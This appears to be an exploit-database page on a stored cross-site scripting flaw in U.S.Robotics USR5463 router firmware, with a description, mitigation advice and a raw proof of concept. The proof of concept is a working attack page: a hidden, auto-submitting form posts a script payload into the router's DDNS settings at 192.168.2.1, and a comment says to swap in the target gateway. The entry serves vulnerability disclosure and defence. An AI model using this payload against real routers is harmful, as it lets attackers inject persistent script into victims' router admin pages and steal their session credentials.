header-logo
Suggest Exploit
vendor:
USR5463 firmware
by:
SH4V
7.5
CVSS
HIGH
HTML-injection
79
CWE
Product Name: USR5463 firmware
Affected Version From: USR5463-v0_01.bin
Affected Version To: USR5463-v0_06.bin
Patch Exists: NO
Related CWE:
CPE: o:us_robotics:usr5463_firmware
Metasploit:
Other Scripts:
Platforms Tested:

HTML-injection vulnerability in U.S.Robotics USR5463 firmware

U.S.Robotics USR5463 firmware is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied data. Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.

Mitigation:

The vendor should release a patch to sanitize user-supplied data and prevent HTML-injection attacks. Users should update their firmware to the latest version to mitigate this vulnerability. Additionally, web developers should implement proper input validation and sanitization techniques to prevent HTML-injection attacks.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/40292/info

U.S.Robotics USR5463 firmware is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied data.

Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.

U.S.Robotics firmware USR5463 0.06 is vulnerable. 

<!--
Author: SH4V
BUG: permanent XSS
Firmware: USR5463-v0_01.bin - USR5463-v0_06.bin
Router: USR5463 802.11g Wireless Router
Company: US Robotics
Just change http://192.168.2.1/ by your current gateway.
-->
<form action="http://192.168.2.1/cgi-bin/setup_ddns.exe" method="post">
<input type=hidden name="ddns_domainame" value=&#039;"><script>alert(1)</script>&#039;>
<input type=hidden name="ddns_account" value=&#039;&#039;>
<input type=password size=1 name="ddns_password" value=&#039;&#039;>
</form>
<script>document.forms[0].submit()</script>